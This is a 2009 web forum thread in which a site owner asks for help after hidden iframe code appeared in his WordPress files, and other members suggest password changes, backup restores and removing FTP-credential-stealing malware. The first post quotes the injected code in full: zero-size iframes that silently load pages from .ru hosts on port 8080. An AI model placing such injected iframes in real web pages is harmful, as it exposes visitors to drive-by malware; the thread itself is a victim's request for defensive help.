Iframe spam showing up in wordpress templates

Discussion in 'WordPress' started by celtics23, Oct 23, 2009.

  1. #1
    this is the second time in a few days that randomly, during the night, without me doing any work to my site, i get the following error message start coming up on www.midweekpolitics.com:

    Parse error: syntax error, unexpected T_STRING in /home/midweekp/public_html/index.php on line 18

    Upon investigation, that line refers to some weird iframe stuff referring to .ru sites that is in the code:

    <iframe frameborder="0" onload="if (!this.src){ this.src='http://intelq.ru:8080/index.php'; this.height='0'; this.width='0';}" >guujlquemswxeftblmwvmis
    <iframe frameborder="0" onload="if (!this.src){ this.src='http://iquotient.ru:8080/index.php'; this.height='0'; this.width='0';}" >wfnawqfzjddeigipfjwtmqkliixxndi</iframe>

    several pages have this in it, including when i go to www.midweekpolitics.com/wp-admin

    i've changed passwords, and it's a brand new vps, so it's not like it's been around so long with the same password that there are liekly security issues. how would i fix and prevent this? going through and simply removing the iframe lines didnt fix it, so i put the code back exactly how it was and posted here.
     
    celtics23, Oct 23, 2009 IP
  2. Kerosene

    Kerosene Alpha & Omega™ Staff

    Messages:
    11,366
    Likes Received:
    575
    Best Answers:
    4
    Trophy Points:
    385
    #2
    Sort the files in your root directory by date and see if there's any newish files that don't belong - or if there's any files that DO belong, but have unusually recent modified date stamps.

    If you've got a backup of your WP database, it would probably be quicker to just delete everything, change your FTP password, create a NEW db (with a new login/pass) and reimport everything. If you've got backups, it's probably 10 minutes work at the most.

    Did you change your FTP, MySQL, and Wordpress passwords?
     
    Kerosene, Oct 23, 2009 IP
  3. celtics23

    celtics23 Peon

    Messages:
    156
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #3
    i didn't change all the passwords, that's a good point. if i backup the db now, will it still be an effective backup to restore from, or would it be "tainted" in some way.

    also: where in wordpress (which file) do i change the mysql password in?
     
    celtics23, Oct 23, 2009 IP
  4. Kerosene

    Kerosene Alpha & Omega™ Staff

    Messages:
    11,366
    Likes Received:
    575
    Best Answers:
    4
    Trophy Points:
    385
    #4
    I'd be more likely to trust a (posts only) export from WP admin than a full export of your entire MySQL db. A WP backup might take a bit of noodling to restore (I don't think it saves your comments btw!), but I think it's probably the safer option.

    wp-config.php


    Good luck! :)
     
    Kerosene, Oct 23, 2009 IP
  5. ads2help

    ads2help Peon

    Messages:
    2,142
    Likes Received:
    67
    Best Answers:
    1
    Trophy Points:
    0
    #5
    ads2help, Oct 23, 2009 IP
  6. celtics23

    celtics23 Peon

    Messages:
    156
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #6
    interesting, i do indeed have filezilla with stored access info. i just went in, cleared it, and uninstalled filezilla altogether. what is a safe ftp program to use? a quick google search revealed many ftp programs that do this exact thing.
     
    celtics23, Oct 23, 2009 IP
  7. celtics23

    celtics23 Peon

    Messages:
    156
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #7
    VIRUS SCAN just found this, which sounds like EXACTLY what would cause this. what should i do? will avg remove these properly?

    "Detection name";"Virus found HTML/Framer"
    "Object type";"file"
    "SDK Type";"Core"
    "Result";"Infected"
    "Action history";""
     
    celtics23, Oct 23, 2009 IP
  8. celtics23

    celtics23 Peon

    Messages:
    156
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #8
    avg is saying "not removed or healed"...how do i heal these?
     
    celtics23, Oct 23, 2009 IP
  9. ads2help

    ads2help Peon

    Messages:
    2,142
    Likes Received:
    67
    Best Answers:
    1
    Trophy Points:
    0
    #9
    I don't know which software is safe, because the virus attacks not only FileZilla.

    Looks like AVG can't remove it.

    Anyway, just don't save password and I think it will be fine.
     
    ads2help, Oct 23, 2009 IP